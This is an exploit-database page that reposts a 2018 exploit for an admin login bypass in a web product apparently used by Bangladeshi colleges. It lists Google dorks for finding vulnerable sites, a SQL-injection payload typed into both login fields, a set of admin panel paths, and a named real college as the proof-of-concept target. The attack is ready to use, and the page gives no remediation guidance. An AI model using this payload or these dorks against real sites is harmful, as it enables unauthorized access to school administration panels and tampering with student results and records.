Advertisement






Design & Development World IT Expert Ahasan Habib Admin Login Bypass Vulnerability

CVE Category Price Severity
N/A CWE-592 N/A N/A
Author Risk Exploitation Type Date
Ahasan Habib High Remote 2018-07-07
CPE
cpe:Not available
CVSS EPSS EPSSP
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070064

Below is a copy:

Design & Development World IT Expert Ahasan Habib Admin Login Bypass Vulnerability
#################################################################################################

# Exploit Title : Design & Development World IT Expert Ahasan Habib Admin Login Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 07/07/2018
# Vendor Homepage : worlditexpert.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]
+ CWE-264 [ Permissions, Privileges, and Access Controls ]

#################################################################################################

# Google Dorks  : 

intext:''Design & Development World IT Expert'' site:bd

intext:'' Develop By: Ahasan Habib''

# Administration Control Panel Path : /admin

# Exploit : 

Username : '=''or'

Password : '=''or'

Useable Administration Control Panel URL Links =>

/admin/home.php
/admin/routine.php
/admin/syllabus.php
/admin/notice.php
/admin/teacher.php
/admin/view_teacher.php
/admin/department.php
/admin/pages_timeline.html
/admin/view_result.php
/admin/insert_result.php
/admin/creat_menu.php
/admin/creat_sub_menu.php
/admin/gallery.html
/admin/tables.html
/admin/maps.html
/admin/subject.php
/admin/blank.html
/admin/blank2.html
/admin/login.html

#################################################################################################

# Example Site => mrahamancollegepanchagarh.edu.bd => [ Proof of Concept ] => archive.is/T8IdV

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.